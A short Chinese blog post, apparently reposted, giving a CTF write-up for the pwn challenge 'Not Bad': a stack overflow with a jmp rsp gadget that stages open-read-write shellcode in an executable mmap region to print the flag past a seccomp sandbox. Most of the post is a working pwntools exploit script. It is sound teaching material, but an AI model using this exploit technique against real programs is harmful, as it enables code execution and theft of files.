Not Bad

exp

有seccmop沙箱,只有几个函数可用,首先想到的思路是用orw打印flag。栈溢出长度有限写不下完整orw,但是题目栈和mmap分配的区域都可写可执行,我们只要通过jmp rsp控制程序流执行完整row即可

from pwn import *

io = process('./idaidg/linux_server64')
#io = remote('node3.buuoj.cn',25254)
context.binary=ELF('./bad')

jump_rsp = 0x400a01
mmap = 0x123000

payload = asm(shellcraft.read(0,mmap,0x100))+asm("mov rax,0x123000;call rax")
payload = payload.ljust(0x28,'a')
payload += p64(jump_rsp)
payload += asm('sub rsp,0x30;jmp rsp')

io.recvuntil('Easy shellcode, have fun!')
io.sendline(payload)

payload = ''
payload+=shellcraft.open('./flag')
payload+=shellcraft.read(3,mmap+0x200,0x100)
payload+=shellcraft.write(1,mmap+0x200,0x100)

sleep(0.2)
io.sendline(asm(payload))

io.interactive()

内容来源

https://blog.csdn.net/github_36788573/article/details/104780509

posted @ 2020-08-03 12:06  PwnKi  阅读(334)  评论(0编辑  收藏  举报